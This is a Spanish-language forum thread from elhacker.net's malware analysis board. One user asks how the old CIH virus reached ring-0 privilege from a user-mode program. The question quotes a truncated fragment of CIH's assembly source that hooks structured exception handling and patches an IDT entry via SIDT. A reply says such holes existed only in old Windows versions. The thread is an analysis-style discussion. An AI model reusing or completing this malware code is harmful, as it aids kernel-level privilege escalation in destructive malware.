elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Usando Git para manipular el directorio de trabajo, el índice y commits (segunda parte)


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Análisis y Diseño de Malware (Moderador: fary)
| | |-+  Instruccion SIDT y el virus CIH.		0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Instruccion SIDT y el virus CIH.  (Leído 2,034 veces)
Usuario887


Desconectado Desconectado

Mensajes: 310


Ver Perfil
Instruccion SIDT y el virus CIH.
« en: 9 Agosto 2020, 14:32 pm »
Hola,
Tengo una duda un poco tonta que me esta rompiendo la cabeza... el virus CIH, para obtener privilegios del sistema, altera la IDT y modifica la entrada de una excepcion que luego ocasiona. Sin embargo, ¿no son, tanto las instrucciones SIDT y LIDT privilegiadas de antemano? es decir, ¿como el virus accede a la IDT cuando es un simple EXE en modo usuario?:

Citar
MyVirusStart:
push ebp

; *************************************
; * Let's Modify Structured Exception *
; * Handing, Prevent Exception Error *
; * Occurrence, Especially in NT. *
; *************************************

lea eax, [esp-04h*2]

xor ebx, ebx
xchg eax, fs:[ebx]

call @0
@0:
pop ebx

lea ecx, StopToRunVirusCode-@0[ebx]
push ecx

push eax

; *************************************
; * Let's Modify *
; * IDT(Interrupt Descriptor Table) *
; * to Get Ring0 Privilege... *
; *************************************

push eax ;
sidt [esp-02h] ; Get IDT Base Address
pop ebx;

add ebx, HookExceptionNumber*08h+04h ; ZF = 0

cli

mov ebp, [ebx] ;
mov bp, [ebx-04h] ; Entry Point

lea esi, MyExceptionHook-@1[ecx]
;...
En línea
el etrno

Desconectado Desconectado

Mensajes: 14


Ver Perfil
Re: Instruccion SIDT y el virus CIH.
« Respuesta #1 en: 6 Septiembre 2020, 04:32 am »
la respuesta corta el windows en los que cih sirve tiene mas hoyos de seguridad que un colador por lo que era posible saltarse ciertos controles y toquetear cosa con permisos de administrador y asta de sistema sin tener privilegios es similar a lo que se hace actualmente con la inyección dll solo que mas fácil no te preocupes por eso actualmente no se puede que yo recuerde
En línea
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Equivalencia C a ASM de una instrucción.
Electrónica 		Meta 3 6,773 Último mensaje 19 Octubre 2008, 06:24 am
por MARCO_RECARGADO
se atasca en una instruccion
Java 		Tyrz 9 5,658 Último mensaje 21 Enero 2011, 20:57 pm
por kasiko
Instrucción % en C++?
Programación General 		.:UND3R:. 1 2,351 Último mensaje 17 Enero 2012, 16:49 pm
por pucheto
Instruccion if
Programación C/C++ 		BJM 3 2,104 Último mensaje 22 Octubre 2012, 17:48 pm
por rir3760
Instruccion sscanf [C]
Programación C/C++ 		oblivionxor 6 2,771 Último mensaje 26 Febrero 2013, 20:36 pm
por oblivionxor
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines